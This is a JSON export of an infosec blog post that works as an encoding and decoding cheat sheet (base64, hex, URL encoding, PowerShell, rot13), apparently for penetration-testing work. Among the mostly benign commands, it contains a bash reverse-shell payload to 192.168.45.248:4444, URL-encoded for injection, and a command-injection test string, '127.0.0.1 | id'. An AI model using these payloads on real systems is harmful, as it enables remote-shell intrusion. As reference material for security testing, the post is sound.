{"id":1011,"date":"2020-03-25T10:02:22","date_gmt":"2020-03-25T09:02:22","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1011"},"modified":"2025-03-18T14:11:29","modified_gmt":"2025-03-18T13:11:29","slug":"fun-with-encoding","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1011","title":{"rendered":"Fun with encoding"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">See <a href=\"https:\/\/gist.github.com\/Neo23x0\/6af876ee72b51676c82a2db8d2cd3639\">https:\/\/gist.github.com\/Neo23x0\/6af876ee72b51676c82a2db8d2cd3639<\/a> as a base64 cheat&nbsp;sheet.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The clas\u00adsic (base64 com\u00adbines the bytes of the text and sep\u00ada\u00adrates 6 bit (2^6 = 64) and maps each 6 bit to a char\u00adac\u00adter. \u201c=\u201d means \u201ctwo byte miss\u00ading\u201d. For exam\u00adple, if the com\u00adbined strings have 2 bit \u201cleft\u201d (41.\u2026), then (A==)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">echo Hi | base64 -d<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Con\u00advert hex into string<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">echo 098f | xxd -ps -r<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Show all non-ASCII characters<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">grep --color='auto' -P -n \"[\\x80-\\xFF]\" file.xml<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Con\u00advert <span class=\"caps\">ASCII<\/span>\/Hex string into&nbsp;<span class=\"caps\">ASCII<\/span><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"># echo -e \"\\x6C\\x65\\x6E\\x67\\x74\\x68\"\nlength<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">hurl \u2014 con\u00advert in many dif\u00adfer\u00adent formats<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hURL --HEX --esc --URL --DURL --HTML --BASE64 \"127.0.0.1 | id\"<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Use a file for mass conversion:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">while read -r line; do hURL --HEX --esc --URL --DURL --HTML --BASE64 \"$line\"; done &lt; file.txt<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">URLen\u00adcode a string in the com\u00admand&nbsp;line:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">echo \"\/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/192.168.45.248\/4444 0&gt;&amp;1'\" | python3 -c \"import urllib.parse, sys; print(''.join([urllib.parse.quote(c, safe='') for c in sys.stdin.read()]))\"<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Windows<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Decode base64 string into a&nbsp;file<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">certutil -decode in.b64 out.txt<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Encode some\u00adthing in Pow\u00ader\u00adShell into Base64:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">PS&gt; $Text = '...'<br>PS&gt; $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)<br>PS&gt; $EncodedText =[Convert]::ToBase64String($Bytes)<br>PS&gt; $EncodedText<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">or<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">[Convert]::ToBase64String([System.IO.File]::ReadAllBytes(\"C:\\path\\to\\file\\example.exe\")) &gt; \"C:\\path\\to\\file\\example.b64\"<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Rot13<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Use this bash loop or Perl one-lin\u00ader to decode a string from rot13 or&nbsp;rotN:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"bash\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>for shift in {2..40}; do\n  echo \"Shift $shift:\"\n  perl -pe 'BEGIN{$shift='\"$shift\"'} $_=join(\"\", map {\/[A-Za-z]\/ ? chr((ord($_)-($_=~\/[a-z]\/?\"a\":\"A\")+$shift)%26+ord($_)) : $_} split(\"\",$_))' &lt;&lt;&lt; \"f1MgN9mTf9SNbzRygcU\"\n  echo \"\"\ndone<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">More<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Use <a href=\"https:\/\/cyberchef.io\/\">CyberChef<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>See https:\/\/gist.github.com\/Neo23x0\/6af876ee72b51676c82a2db8d2cd3639 as a base64 cheat&nbsp;sheet. The clas\u00adsic (base64 com\u00adbines the bytes of the text and sep\u00ada\u00adrates 6 bit (2^6 = 64) and maps each 6 bit to a char\u00adac\u00adter. \u201c=\u201d means \u201ctwo byte miss\u00ading\u201d. For exam\u00adple, if the com\u00adbined strings have 2 bit \u201cleft\u201d (41.\u2026), then (A==) echo Hi | base64 \u2011d Con\u00advert&nbsp;hex&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[468],"tags":[120,235,234],"class_list":["post-1011","post","type-post","status-publish","format-standard","hentry","category-general","tag-conversion","tag-decoding","tag-encoding"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1011","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1011"}],"version-history":[{"count":16,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1011\/revisions"}],"predecessor-version":[{"id":4636,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1011\/revisions\/4636"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1011"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1011"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1011"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}